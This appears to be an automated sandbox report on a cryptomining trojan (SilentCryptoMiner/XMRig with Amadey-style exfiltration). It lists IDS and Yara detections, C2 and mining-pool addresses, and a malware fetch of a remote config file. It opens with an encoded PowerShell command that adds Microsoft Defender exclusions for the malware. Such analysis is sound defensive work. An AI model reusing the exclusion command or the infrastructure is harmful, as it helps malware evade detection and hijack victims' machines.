QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7432, ProcessName: svchost.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T22:40:10.560363+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.5	55329	1.1.1.1	53	UDP

ET MALWARE SilentCryptoMiner Agent Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T22:40:14.631621+0100	2054247	1	A Network Trojan was detected	154.216.20.243	443	192.168.2.5	49709	TCP
2024-12-12T22:41:15.706920+0100	2054247	1	A Network Trojan was detected	154.216.20.243	443	192.168.2.5	49914	TCP
2024-12-12T22:42:16.530195+0100	2054247	1	A Network Trojan was detected	154.216.20.243	443	192.168.2.5	50034	TCP
2024-12-12T22:43:16.377468+0100	2054247	1	A Network Trojan was detected	154.216.20.243	443	192.168.2.5	50115	TCP
2024-12-12T22:44:17.341795+0100	2054247	1	A Network Trojan was detected	154.216.20.243	443	192.168.2.5	50120	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T22:40:16.888945+0100	2044697	1	A Network Trojan was detected	192.168.2.5	49713	154.216.20.243	443	TCP

ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T22:41:15.706336+0100	2051004	2	Crypto Currency Mining Activity Detected	192.168.2.5	49914	154.216.20.243	443	TCP
2024-12-12T22:42:16.529926+0100	2051004	2	Crypto Currency Mining Activity Detected	192.168.2.5	50034	154.216.20.243	443	TCP
2024-12-12T22:43:16.377226+0100	2051004	2	Crypto Currency Mining Activity Detected	192.168.2.5	50115	154.216.20.243	443	TCP
2024-12-12T22:44:17.341589+0100	2051004	2	Crypto Currency Mining Activity Detected	192.168.2.5	50120	154.216.20.243	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe

ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon
Source: https://www.google.com/	HTTP Parser: No favicon

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 7.3.cvtres.exe.171d47d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.cvtres.exe.171d47d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7236, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: _.Pdb=function(a,b){return"requestIdleCallback"in window?window.requestIdleCallback(a,b):window.setTimeout(function(){var c=Date.now();a({didTimeout:!1,timeRemaining:function(){return Math.max(0,10-(Date.now()-c))}})},typeof(b==null?void 0:b.timeout)==="number"&&b.timeout>=0?Math.min(b.timeout,50):50)};_.Qdb=function(a){"cancelIdleCallback"in window&&window.cancelIdleCallback(a);window.clearTimeout(a)}; source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.3127265786.000001FBA7CF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.3127265786.000001FBA7CF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Windows\SYSTEM32\ntmarta.dllv4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dllGitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2876558142.000001FBA7475000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: cvtres.exe, 00000007.00000003.2148391342.00000171D4680000.00000004.00000001.00020000.00000000.sdmp, cvtres.exe, 00000012.00000003.3332406842.000001FA08B00000.00000004.00000001.00020000.00000000.sdmp, orupcopicsyv.sys.7.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: _.Ln(_.Df(_.E4a),_.pdb); source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2876558142.000001FBA7475000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.m.QK=function(){return!0};_.m.pushState=function(a,b,c){this.window.history.pushState(a,b,c);return Promise.resolve()};_.m.replaceState=function(a,b,c){this.window.history.replaceState(a,b,c);return Promise.resolve()};_.Rn(_.pdb,Whb); source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: _.m.replaceState=function(){return _.uh("InternalHistory","replaceState")};_.Rn(B4a,Wbb);_.Xbb=_.Gya;var Ybb=_.Kr("fvjcPb",[_.Lr]);_.Zbb=_.Md("US1EU",[Ybb]);_.$bb=_.Md("BgyPPc",[aab]);_.acb=_.Md("UBGcdd",[cab]);_.bcb=_.Md("eSFC5c");_.ccb=_.Md("B6b85");_.dcb=_.Md("pPxdAd");_.ecb=_.Md("TPCh7b");_.fcb=_.Md("NsiCRb");_.gcb=_.Md("BkiHtd");_.hcb=_.Md("K6ZEbf");_.icb=_.Md("TwdwWc",[]);_.jcb=_.Md("C0JoAb");_.kcb=_.Md("R8gt1");_.lcb=_.Md("yvBIXc");_.mcb=_.Md("hwYI4c",[jab]);_.ncb=_.Md("GTaNlc");_.ocb=_.Md("g6ZUob");_.pcb=_.Md("xkctJ");_.qcb=_.Md("vo3XM");_.rcb=_.Md("YgAQTc",[]);_.scb=_.Md("dbr2Mc");_.tcb=_.Md("krRYtf");_.ucb=_.Md("yWCO4c");_.vcb=_.Md("nVG46b");_.wcb=_.Md("gsJLOc",[]);_.xcb=_.Md("G29HYe",[o7a]);_.ycb=_.Md("h4qzS",[yab]);_.zcb=_.Md("YhmRB");_.Acb=_.Md("wciyUe",[]);_.Bcb=_.Md("Il1M4b");_.Ccb=_.Md("vWfZ8c",[Mab]);_.Dcb=_.Md("KRDUUb");_.Ecb=_.Md("hQ97re");_.Fcb=_.Md("iK2sb");_.Gcb=_.Md("soVptf");_.Hcb=_.Md("YeKaq");_.Icb=_.Md("Odo3Od");_.Jcb=_.Md("d7NTy");_.Kcb=_.Md("VQ7Yuf");_.Lcb=_.Md("M0VQbd");_.Mcb=_.Md("dhjipe",[cbb]);_.Ncb=_.Md("lBp0",[_.p$a]);_.Ocb=_.Md("CJRYDf",[_.Ir]);_.Pcb=_.Md("Z8Pdh");_.Qcb=_.Md("a70q7b");_.Rcb=_.Md("sfFTle",[kbb]);_.Scb=_.Md("nv86s",[nbb]);_.Tcb=_.Md("H1Onzb");_.Ucb=_.Md("QE3hvd");_.Vcb=_.Md("pPIvie",[_.Lr]);_.Wcb=_.Md("XwhUEb",[]);_.Xcb=_.Md("Kmnn6b");_.Ycb=_.Md("FrcyJe");_.Zcb=_.Md("xkjGve",[_.l$a]);_.$cb=_.Md("E2zlIf");var adb=_.Kr("uxcEeb",[_.Lr]);_.bdb=_.Md("LR64x",[adb]);_.cdb=_.Md("HZnJ6");_.ddb=_.Md("v74Vad");_.edb=_.Md("J2YIUd");_.fdb=_.Md("Y2XuT");_.gdb=_.Md("O1Rq3");_.hdb=_.Md("LHCaNd",[]);_.idb=_.Md("wKdTle",[_.Ir,_.N4a]);_.Ur=_.Md("Fdd8nd",[_.idb,_.Pr,_.xg]);_.jdb=_.Md("b6vcbb",[_.Gr]);_.kdb=_.Md("ttQ27",[_.dg,_.Do,_.Ur,_.idb]);_.ldb=_.Md("SGpRce",[_.dg,_.Ur,_.jdb,_.idb]);_.mdb=_.Md("lcrkwe",[_.dg,_.FYa,_.Do,_.idb,_.DYa,_.ldb,_.kdb]);_.ndb=_.Md("CpWC2d",[]);_.odb=_.Md("j9Yuyc",[]);_.pdb=_.Md("ofjVkb",[_.Mn]);_.qdb=_.Md("rlHKFc",[_.Er]);_.rdb=_.Md("sZnyj",[]);_.sdb=_.Md("jn2sGd",[_.Ir]);_.tdb=_.Md("p4LrCe",[]);_.udb=_.Md("k0T3Ub",[_.tdb]);var vdb=function(){};_.m=vdb.prototype;_.m.fD=function(a){return lya().fD(a)};_.m.setTimeout=function(a,b){var c=_.Jc.apply(2,arguments),d;return(d=lya()).setTimeout.apply(d,[a,b].concat(_.jd(c)))};_.m.setInterval=function(a,b){var c=_.Jc.apply(2,arguments),d;return(d=lya()).setInterval.apply(d,[a,b].concat(_.jd(c)))};_.m.clearTimeout=function(a){return lya().clearTimeout(a)};_.m.clearInterval=function(a){return lya().clearInterval(a)};_.Vr=new vdb; source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: cfb.prototype.requestIdleCallback=function(a,b){return _.Pdb(a,b)};cfb.prototype.cancelIdleCallback=function(a){_.Qdb(a)};_.An(_.XMa,new cfb); source: chromecache_125.12.dr, chromecache_115.12.dr

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF8490F2C23h		0_2_00007FF8490F2A8D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF8490F2C23h		0_2_00007FF8490F2A8D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.5:49713 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.5:49914
Source: Network traffic	Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.5:50034
Source: Network traffic	Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.5:50115
Source: Network traffic	Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.5:50120

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 154.216.20.243 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 37.203.243.102 3333	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.157.162.216 4444	Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 37.203.243.102:3333
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 185.157.162.216:4444

Source: Joe Sandbox View	IP Address: 154.216.20.243 154.216.20.243
Source: Joe Sandbox View	IP Address: 37.203.243.102 37.203.243.102
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	ASN Name: DAPLDATAPLANETLtdRU DAPLDATAPLANETLtdRU
Source: Joe Sandbox View	ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:55329 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49914 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:50034 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:50115 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:50120 -> 154.216.20.243:443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /P.txt HTTP/1.1Accept: /Connection: closeHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=1/ed=1/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=1/ed=1/dg=3/br=1/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RCF5Sd:X1kBmd;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UVzb9c:IvPZ6d;Uvc8o:VDovNc;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;ZlOOMb:P0I0Ec;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl